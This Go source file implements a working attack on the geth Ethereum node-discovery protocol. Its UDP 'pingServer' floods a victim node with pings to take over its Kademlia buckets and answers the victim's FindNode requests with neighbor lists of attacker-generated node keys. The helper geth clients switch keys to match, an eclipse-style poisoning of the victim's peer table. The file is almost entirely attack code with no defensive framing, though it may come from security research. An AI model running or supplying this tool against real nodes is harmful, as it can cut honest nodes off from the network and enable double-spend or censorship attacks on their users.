package gethTest

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"io"
	"math/big"
	"net"
	"os"
	"time"

	"github.com/ethereum/go-ethereum/common"
	"github.com/ethereum/go-ethereum/common/math"
	"github.com/ethereum/go-ethereum/crypto"
	"github.com/ethereum/go-ethereum/crypto/secp256k1"
	"github.com/ethereum/go-ethereum/p2p/enode"
	"github.com/ethereum/go-ethereum/rlp"
)

type pingServer struct {
	targetIp      net.IP
	targetPort    int
	targetId      *NodeID
	ourIp         net.IP
	ourUdpPort    int
	ourTcpPort    int
	privKey       *ecdsa.PrivateKey
	privKeyBucket int

	IsBucketAttacker bool

	// Bucket attack handling
	BucketAttackGeth *gethClient

	// FindNode attack handling
	neighborTargetId enode.ID
	neighborList     []rpcNode
	kad              *kademliaStorage
	GethClients      []*gethClient
	FindNodeClients  []*pingServer

	conn    net.UDPConn
	closing chan struct{}
}

// private functions

// extractTargetID extracts the NodeID of the target
func (s *pingServer) extractTargetID(inBuf []byte) {
	headSize := MacSize + SigSize
	sig := inBuf[MacSize:headSize]

	fromId, err := recoverNodeID(crypto.Keccak256(inBuf[headSize:]), sig)
	if err != nil {
		fmt.Println("Failed to recover node (", err, ")")
	}

	if s.targetId[0] == 0 {
		for i, _ := range fromId {
			s.targetId[i] = fromId[i]
		}
	}
}

// ping sends a single ping-message to the target
func (s *pingServer) ping() {
	if s.IsBucketAttacker == false {
		return
	}
	ourAddr := &net.UDPAddr{
		IP:   s.ourIp,
		Port: s.ourUdpPort,
	}
	targetAddr := &net.UDPAddr{
		IP:   s.targetIp,
		Port: s.targetPort,
	}

	packet := NewPingPacket(ourAddr, targetAddr, s.ourTcpPort, s.privKey)

	_, err := s.conn.WriteToUDP(packet, targetAddr)
	if err != nil {
		fmt.Println("Error sending ping packet (", err, ")")
	}
}

func (s *pingServer) Ping() {
	s.ping()
}

// pong sends a single pong-message to the target
func (s *pingServer) pong(buf []byte) {
	if s.IsBucketAttacker == false {
		return
	}
	mac := buf[:MacSize]
	toaddr := &net.UDPAddr{
		IP:   s.targetIp,
		Port: s.targetPort,
	}

	packet := NewPongPacket(mac, toaddr, s.privKey)

	_, err := s.conn.WriteToUDP(packet, toaddr)
	if err != nil {
		fmt.Println("Error sending pong packet (", err, ")")
	}
}

func (s *pingServer) FindNode(target NodeID) {
	s.findnode(target)
}

func (s *pingServer) findnode(target NodeID) {
	packet := NewFindnodePacket(target, s.privKey)
	toaddr := &net.UDPAddr{
		IP:   s.targetIp,
		Port: s.targetPort,
	}
	_, err := s.conn.WriteToUDP(packet, toaddr)
	if err != nil {
		fmt.Println("Error sending findnode packet (", err, ")")
	}
}

// neighbors sends a single neighbors-message to the target
func (s *pingServer) neighbors(buf []byte) {
	timeStart := time.Now()
	// decode FindNode request
	req := new(findnode)
	_, _, sigdata := buf[:MacSize], buf[MacSize:HeadSize], buf[HeadSize:]
	stream := rlp.NewStream(bytes.NewReader(sigdata[1:]), 0)
	err := stream.Decode(req)
	neighborTargetId := enode.ID(crypto.Keccak256Hash(req.Target[:]))
	neighborTargetIdHash := crypto.Keccak256Hash(req.Target[:])
	fmt.Println(s.ourUdpPort, "Victim looks for:", neighborTargetIdHash)

	neighborTargetIdOld := s.neighborTargetId
	if s.IsBucketAttacker == false {
		pubKey := s.privKey.Public().(*ecdsa.PublicKey)

		var neighborId [64]byte
		math.ReadBits(pubKey.X, neighborId[:len(neighborId)/2])
		math.ReadBits(pubKey.Y, neighborId[len(neighborId)/2:])

		var node rpcNode
		node.IP = s.ourIp
		node.ID = neighborId
		node.UDP = uint16(s.ourUdpPort)
		node.TCP = uint16(s.ourTcpPort)

		s.neighborList = s.neighborList[:0]
		s.neighborList = append(s.neighborList, node)
	} else {
		if neighborTargetIdOld != neighborTargetId {
			s.neighborList = s.neighborList[:0]
			neighborKeys := s.kad.Pop(neighborTargetIdHash)
			for i := 0; i < 2; i++ {
				neighborPriv := neighborKeys[i].Key
				neighborPub := neighborPriv.Public().(*ecdsa.PublicKey)
				var neighborId [64]byte
				math.ReadBits(neighborPub.X, neighborId[:len(neighborId)/2])
				math.ReadBits(neighborPub.Y, neighborId[len(neighborId)/2:])
				nodekeyHex := fmt.Sprintf("%x", neighborPriv.D)

				n := s.FindNodeClients[i]
				n.SetPrivateKey(neighborPriv)
				if !s.GethClients[i].IsConnected() {
					s.GethClients[i].ChangeNodeKey(nodekeyHex)
				}
				var node rpcNode
				node.IP = s.ourIp
				node.ID = neighborId
				node.UDP = uint16(n.ourUdpPort)
				node.TCP = uint16(n.ourTcpPort)

				s.neighborList = append(s.neighborList, node)
			}
			s.neighborTargetId = neighborTargetId // replace old target id
		}
	}

	// send rpcNode array to target
	targetAddr := &net.UDPAddr{
		IP:   s.targetIp,
		Port: s.targetPort,
	}

	packet := NewNeighborsPacket(s.neighborList, s.privKey)

	_, err = s.conn.WriteToUDP(packet, targetAddr)
	if err != nil {
		fmt.Println("Error sending neighbors packet (", err, ")")
	} else {
		fmt.Println(s.ourUdpPort, "Sent neighbors packet. Delay:", time.Since(timeStart))
	}
}

// receive handles incoming datagrams
func (s *pingServer) receive() {
	headSize := MacSize + SigSize

	inBuf := make([]byte, 1280)
	s.conn.SetReadDeadline(time.Now().Add(2 * time.Second))
	readLen, _, err := s.conn.ReadFromUDP(inBuf)
	if err != nil {
		return
	}
	inBuf = inBuf[:readLen]
	if len(inBuf) < headSize+1 {
		fmt.Println("Packet too small (", err, ")")
	}
	hash := inBuf[:MacSize]
	sig := inBuf[MacSize:headSize]
	sigdata := inBuf[headSize:]

	shouldhash := crypto.Keccak256(inBuf[MacSize:])
	if !bytes.Equal(hash, shouldhash) {
		fmt.Println("Wrong hash!")
		fmt.Println("Hash:", hash)
		fmt.Println("Should Hash:", shouldhash)
	}

	s.extractTargetID(inBuf)

	fromID, err := recoverNodeID(crypto.Keccak256(inBuf[headSize:]), sig)
	if err != nil {
		fmt.Println("Failed to recover node (", err, ")", fromID)
	}
	//fmt.Println("FromID:", fromID)
	// sigdata[0]:
	// x01 -> ping
	// x02 -> pong
	// x03 -> findnode
	// x04 -> neighbors

	// send pongs for incoming pings in order to enter target's buckets
	// send neighbor-msgs for incoming FindNode-msgs
	if sigdata[0] == byte(1) {
		s.pong(inBuf)
	} else if sigdata[0] == byte(3) {
		s.neighbors(inBuf)
	}

	// calculate victim bucket number for our NodeID
	if s.targetId != nil {
		return
	}
	priv := s.privKey
	pubkey := elliptic.Marshal(secp256k1.S256(), priv.X, priv.Y)
	pubkey = pubkey[1:]

	bucketNum := getBucketNum(pubkey, s.targetId[:])
	s.privKeyBucket = bucketNum

}

// pingLoop manages the ping loop
func (s *pingServer) pingLoop() {
	fmt.Println("Starting Ping Loop...")
	for {
		select {
		case <-s.closing:
			fmt.Println("Stopping UDP Ping Loop...")
			return
		default:
			s.ping()
			time.Sleep(100 * time.Millisecond)
		}
	}
}

// receiveLoop manages the receive loop
func (s *pingServer) receiveLoop() {
	for {
		select {
		case <-s.closing:
			return
		default:
			s.receive()
		}
	}
}

// public functions

// ParsePrivateKeyHex
func (s *pingServer) ParsePrivatePublicKeyHex(privateKeyHex, publicKeyHex string) (*ecdsa.PrivateKey, common.Hash) {
	key, err := hex.DecodeString(privateKeyHex)
	if err != nil {
		fmt.Println("Error decoding key. (", err, ")")
	}
	priv := new(ecdsa.PrivateKey)
	priv.PublicKey.Curve = secp256k1.S256()
	priv.D = new(big.Int).SetBytes(key)

	if priv.D.Sign() <= 0 {
		fmt.Println("invalid private key")
	}
	publicKey, _ := hex.DecodeString(publicKeyHex)
	x, y := elliptic.Unmarshal(secp256k1.S256(), publicKey)
	priv.PublicKey = ecdsa.PublicKey{Curve: secp256k1.S256(), X: x, Y: y}
	if x == nil {
		fmt.Println("invalid public key")
	}
	pubkey := elliptic.Marshal(secp256k1.S256(), priv.X, priv.Y)
	pubkey = pubkey[1:]
	hash := crypto.Keccak256Hash(pubkey)
	return priv, hash
}

// ParsePrivateKeyFile extracts a EC private key from the specified file
func (s *pingServer) ParsePrivateKeyFile(privKeyFile string) {
	fd, err := os.Open(privKeyFile)
	if err != nil {
		fmt.Println("Error opening key file. (", err, ")")
		return
	}
	defer fd.Close()

	buf := make([]byte, 64)
	if _, err := io.ReadFull(fd, buf); err != nil {
		fmt.Println("Error reading key file. (", err, ")")
		return
	}

	key, err := hex.DecodeString(string(buf))
	if err != nil {
		fmt.Println("Error decoding key. (", err, ")")
		return
	}
	priv := s.privKey

	priv.PublicKey.Curve = secp256k1.S256()
	priv.D = new(big.Int).SetBytes(key)

	if priv.D.Sign() <= 0 {
		fmt.Println("invalid private key")
		return
	}

	priv.PublicKey.X, priv.PublicKey.Y = priv.PublicKey.Curve.ScalarBaseMult(key)
	if priv.PublicKey.X == nil {
		fmt.Println("invalid private key")
		return
	}
}

// WriteTargetIdFile writes the target's NodeID to the specified file
func (s *pingServer) WriteTargetIdFile(file string) {
	fd, err := os.Create(file)
	if err != nil {
		fmt.Println("Error creating target NodeID file (", err, ")")
	}
	defer fd.Close()

	dst := make([]byte, hex.EncodedLen(len(s.TargetId()[:])))
	hex.Encode(dst, s.TargetId()[:])
	fd.Write(dst)
}

// ParseTargetIdFile extracts the target's public key from the specified file
func (s *pingServer) ParseTargetIdFile(file string) {
	fd, err := os.Open(file)
	if err != nil {
		fmt.Println("Error opening key file. (", err, ")")
		return
	}
	defer fd.Close()

	buf := make([]byte, 128)

	if _, err := io.ReadFull(fd, buf); err != nil {
		fmt.Println("Error reading key file. (", err, ")")
		return
	}

	fromId, err := hex.DecodeString(string(buf))
	if err != nil {
		fmt.Println("Error decoding key. (", err, ")")
		return
	}

	for i, _ := range fromId {
		s.targetId[i] = fromId[i]
	}

	// calculate target bucket number for our NodeID
	priv := s.privKey
	pubkey := elliptic.Marshal(secp256k1.S256(), priv.X, priv.Y)
	pubkey = pubkey[1:]

	targetId := s.targetId[:]
	bucketNum := getBucketNum(pubkey, targetId)
	s.privKeyBucket = bucketNum
}

// GeneratePrivateKey generates a new EC private key and calculates the bucket
// number
func (s *pingServer) GeneratePrivateKey() {
	privKey, _ := ecdsa.GenerateKey(secp256k1.S256(), rand.Reader)
	s.privKey = privKey

	// calculate target bucket number for our NodeID
	priv := s.privKey
	pubkey := elliptic.Marshal(secp256k1.S256(), priv.X, priv.Y)
	pubkey = pubkey[1:]

	targetId := s.targetId[:]
	s.privKeyBucket = getBucketNum(pubkey, targetId)
}

func (s *pingServer) SetPrivateKey(key *ecdsa.PrivateKey) {
	s.privKey = key
}

// PrivateKey returns the stored private key
func (s *pingServer) PrivateKey() *ecdsa.PrivateKey {
	return s.privKey
}

// NodeIDHashed returns our hashed NodeID
func (s *pingServer) NodeIDHashed() common.Hash {
	priv := s.privKey
	pubkey := elliptic.Marshal(secp256k1.S256(), priv.X, priv.Y)
	pubkey = pubkey[1:]
	hash := crypto.Keccak256Hash(pubkey)
	return hash
}

func (s *pingServer) PrivateKeyHex() string {
	return fmt.Sprintf("%x", s.privKey.D)
}

func (s *pingServer) PublicKeyHex() string {
	pub := s.privKey.Public().(*ecdsa.PublicKey)
	pubKeyBytes := elliptic.Marshal(secp256k1.S256(), pub.X, pub.Y)
	return fmt.Sprintf("%x", pubKeyBytes)
}

// TargetIdHashed
func (s *pingServer) TargetIdHashed() common.Hash {
	hash := crypto.Keccak256Hash(s.targetId[:])
	return hash
}

func (s *pingServer) TargetId() *NodeID {
	return s.targetId
}

func (s *pingServer) OurIp() net.IP {
	return s.ourIp
}

func (s *pingServer) BucketNumber() int {
	return s.privKeyBucket
}

func (s *pingServer) SetKademliaStorage(kad *kademliaStorage) {
	s.kad = kad
}

// Start starts the receive and ping loops
func (s *pingServer) Start() {
	go s.receiveLoop()
	go s.pingLoop()
}

// Stop stops the receive and ping loops and closes the UDP connection
func (s *pingServer) Stop() {
	close(s.closing)
	s.conn.Close()
}

// NewPingServer creates a new pingServer, sets the corresponding variables and
// returns a pointer to the new pingServer
func NewPingServer(tIp string, tPort, oUdpPort, oTcpPort int) *pingServer {
	var err error

	s := new(pingServer)
	s.IsBucketAttacker = true
	s.targetPort = tPort
	s.ourUdpPort = oUdpPort
	s.ourTcpPort = oTcpPort
	s.closing = make(chan struct{})
	s.targetIp, _, err = net.ParseCIDR(tIp + "/24")
	if err != nil {
		fmt.Println("Error parsing target IP (", err, ")")
	}
	s.privKey = new(ecdsa.PrivateKey)
	s.targetId = new(NodeID)

	// get local IP
	uconn, err := net.Dial("udp", net.JoinHostPort(s.targetIp.String(), "80"))
	localAddr := uconn.LocalAddr().(*net.UDPAddr)
	uconn.Close()

	addr := net.UDPAddr{
		Port: oUdpPort,
		IP:   localAddr.IP,
	}
	conn, err := net.ListenUDP("udp", &addr)
	if err != nil {
		fmt.Println("Target seems to be offline (", err, ")")
	}
	ourIp := conn.LocalAddr().(*net.UDPAddr).IP
	s.ourIp = ourIp
	s.conn = *conn

	return s
}
